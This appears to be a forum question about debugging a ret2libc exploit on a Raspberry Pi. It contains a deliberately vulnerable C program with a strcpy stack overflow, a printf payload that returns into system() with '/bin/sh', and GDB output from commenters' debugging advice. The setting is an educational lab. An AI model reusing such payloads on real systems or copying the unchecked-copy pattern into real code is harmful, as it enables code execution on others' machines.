# Ret2libc exploit in ARM

Tags: raspberry-pi, arm, stack-overflow, exploit

I'm trying to exploit ret2libc in ARM (Raspberry pi). I get this error:

```
sh: 1: t: not found
```

Can someone explain what this error means? Ii know that it could successfully get the shell but there is something wrong with the argument that I've sent:

```
./ret2ZP `printf "/bin/sh;#CCC\x3c\xef\xff\xbe\x54\xb1\xe9\xb6"`
```

This is the address of `system` function: `x54\xb1\xe9\xb6`

And this is the vulnerable code that I'm using:

```
#include <stdio .h> 
#include <string .h> 
#include <stdlib .h>

void donuts() {
    puts ( ”Donuts . . . ” ) ;
    exit (0);
}
void vuln(char ∗arg) { 
    char buff [10];
    strcpy(buff, arg);
}
int main(int argc , char ∗∗argv) { 
    vuln(argv [1]);
    return 0 ;
}
```

Comment: What is your current understanding of what's happening? Have you tried using a debugger to get more insight into it?

Comment: @domen: yes, I'm using GDB, I see that content of r0 is this: 
info registers:
r0          0xbefff25a          
x/s  0xbefff25a
0xbefff25a:         "/bin/sh;#ccc<\357\377\276T\261", <incomplete sequence \351\266>

Comment: @domen
Apparently "/bin/sh" is overwritten in register r0 but I have no idea what that shell error mean.

Comment: You could break on system, see the exact argument etc. Or further on exec* that loads sh.